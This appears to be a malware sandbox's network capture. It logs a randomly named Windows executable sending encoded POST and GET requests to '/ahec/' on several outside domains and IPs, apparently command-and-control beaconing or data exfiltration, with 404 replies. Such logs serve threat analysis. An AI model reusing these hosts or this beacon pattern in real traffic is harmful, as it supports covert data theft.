                                                                                                                                                            Dec 8, 2023 14:51:21.900505066 CET | 773 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.instantconvey.com
                                                                                                                                                            Origin: http://www.instantconvey.com
                                                                                                                                                            Referer: http://www.instantconvey.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=fGFjl9hS4wS+jzYjgepxbBFbsNO2Tg2LVeb1efM1x9xamU7y7kP7DyWHphlSeKgRrXylkhmRjeQM7ax2dCroG3giwNaL9la2P+zE+/skV7oOip2tKNBw5EBbYnZWMf8BymZ0U4/zZJQg7Mv90edWH6C3oHd0MHfBj+Ynrlw+0Tjn/AflJtUqZkda2+HAZbr2PYKJMew=
                                                                                                                                                            Dec 8, 2023 14:51:22.063608885 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:51:21 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 315
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            15 | 192.168.2.4 | 49755 | 131.153.147.90 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:51:24.577001095 CET | 10855 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.instantconvey.com
                                                                                                                                                            Origin: http://www.instantconvey.com
                                                                                                                                                            Referer: http://www.instantconvey.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=
                                                                                                                                                            Dec 8, 2023 14:51:24.753015041 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:51:24 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 315
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            16 | 192.168.2.4 | 49756 | 131.153.147.90 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:51:27.263885975 CET | 474 | OUT | GET /ahec/?XveXHZvx=SEtDmKR01RO/v1ckzNpTcUhCl/PMZGqFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7YIFIq1ILz0nKZVg==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.instantconvey.com
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:51:27.422880888 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:51:27 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 315
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            17 | 192.168.2.4 | 49757 | 94.23.162.163 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:51:33.044251919 CET | 768 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.domainappraisalbot.com
                                                                                                                                                            Origin: http://www.domainappraisalbot.com
                                                                                                                                                            Referer: http://www.domainappraisalbot.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=WDRpQvXLf5KbzDhe8sZKH+nNsFO0b4x5lEtrmZrWKKEb2Gr+pZAc5DjAw7QYfCHXA1wY332tTZk3UcG0vcIawL87NDdA642uqmQ2EyrzFiOkh9o17jUWgPsSEf+5ZgC86LcIXaVko37KrMPoacoT3okUPyFl151FgVsrpQYNWyP22CouZA==


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            18 | 192.168.2.4 | 49758 | 94.23.162.163 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:51:35.798079014 CET | 788 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.domainappraisalbot.com
                                                                                                                                                            Origin: http://www.domainappraisalbot.com
                                                                                                                                                            Referer: http://www.domainappraisalbot.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=WDRpQvXLf5KbpiRewtZKGenOwVO0UYx9lDlrmcTGJ4Qb4DX+oYAc+DjA7bQdbCG6A1Mh3z2tTZg3Ud20oqAZyb89CjdG3Y2uqmQ2Ey/JFmikmMY16G0XhPsRSP+5dgC46Lc2XeVOo1zKrJjoZNoU5okaFSF78Js81Wlqqhc0Umed+3E9e08POxMgflZiou9moafAsJs=


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            19 | 192.168.2.4 | 49759 | 94.23.162.163 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:51:39.448764086 CET | 10870 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.domainappraisalbot.com
                                                                                                                                                            Origin: http://www.domainappraisalbot.com
                                                                                                                                                            Referer: http://www.domainappraisalbot.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49760 | 94.23.162.163 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:51:42.204368114 CET | 479 | OUT | GET /ahec/?XveXHZvx=bB5JTYLqXbmN0Rh52tJaPPP1nCuGRYxCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYc20p8FNjdU2pWhmA==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.domainappraisalbot.com
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 8, 2023 14:51:42.441059113 CET | 337 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:51:42 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 178
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49761 | 66.29.155.54 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:51:47.909106970 CET | 738 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.nesmalt.info
                                                                                                                                                            Origin: http://www.nesmalt.info
                                                                                                                                                            Referer: http://www.nesmalt.info/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=ORDmYl44AESwkF+B3ybxO1+wUHNIHFFgCR1isUVEz41lMihcDocaejvvBMKLAgFdCgjcOg4XUOuUGf633XpWbMziV7LUKgkDPAbMt8kJYGOis7ita4x2mzY9ynXEjpO0/9MwHtsv/vada6LQAWibwjodCeC8u61CQbLBTomnAX4G2ktjkQ==
Dec 8, 2023 14:51:48.218774080 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:51:48 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 5278
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49762 | 66.29.155.54 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:51:50.635157108 CET | 758 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.nesmalt.info
                                                                                                                                                            Origin: http://www.nesmalt.info
                                                                                                                                                            Referer: http://www.nesmalt.info/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=ORDmYl44AESw2UOB0RzxG1+zYnNINlFkCRpisVQfzKRlNDRcCtoadjvvKsKXdwFGCgehOhUXUO6UGdS32mpRaczgebLSEAkDPAbMt8heYCqiwaStIpx54DY+7HXEnpP9/9MSHvIF/qGda/3QBDWEpzobN+DXuJELT7eyQbS7NRQRzxBwjhwnrjcdWtwJKtcx4Xbu3SE=
Dec 8, 2023 14:51:50.925204039 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:51:50 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 5278
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Dec 8, 2023 14:51:50.925232887 CET1286INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                                                                                                            Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                                                                                                            Dec 8, 2023 14:51:50.925378084 CET1286INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                                                                                                            Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                                                                                                            Dec 8, 2023 14:51:50.925425053 CET1286INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                                                                                                            Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                                                                                                            Dec 8, 2023 14:51:50.925646067 CET279INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                                                                                                            Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


Session ID  Source IP    Source Port  Destination IP  Destination Port
23          192.168.2.4  49763        66.29.155.54    80

Timestamp                           Bytes transferred  Direction  Data
Dec 8, 2023 14:51:53.354933023 CET  10840              OUT        POST /ahec/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.nesmalt.info
Origin: http://www.nesmalt.info
Referer: http://www.nesmalt.info/ahec/
Cache-Control: no-cache
Content-Length: 10289
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 8, 2023 14:51:53.648900986 CET  1286               IN         HTTP/1.1 404 Not Found
Date: Fri, 08 Dec 2023 13:51:53 GMT
Server: Apache
Content-Length: 5278
Connection: close
Content-Type: text/html


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
24          192.168.2.4  49764        66.29.155.54    80                5016  C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 8, 2023 14:51:57.012130022 CET  469                OUT        GET /ahec/?XveXHZvx=DTrGbTEHMG6Y4mK16jmiKUG3Xw8oKDF5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRrX+Dyau3GNz4OAA==&l4xX=rDStpH0He HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.nesmalt.info
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 8, 2023 14:51:57.301047087 CET  1286               IN         HTTP/1.1 404 Not Found
Date: Fri, 08 Dec 2023 13:51:57 GMT
Server: Apache
Content-Length: 5278
Connection: close
Content-Type: text/html; charset=utf-8
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 
2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-
                                                                                                                                                            Dec 8, 2023 14:51:57.301076889 CET1286INData Raw: 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33
                                                                                                                                                            Data Ascii: 23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5
Dec 8, 2023 14:51:57.301099062 CET | 1286 | IN
                                                                                                                                                            Data Ascii: 9 2.03 1.32 3.75 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"
Dec 8, 2023 14:51:57.301146030 CET | 1286 | IN
                                                                                                                                                            Data Ascii: 19 15.27 3.19 23.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.0
Dec 8, 2023 14:51:57.301158905 CET | 294 | IN
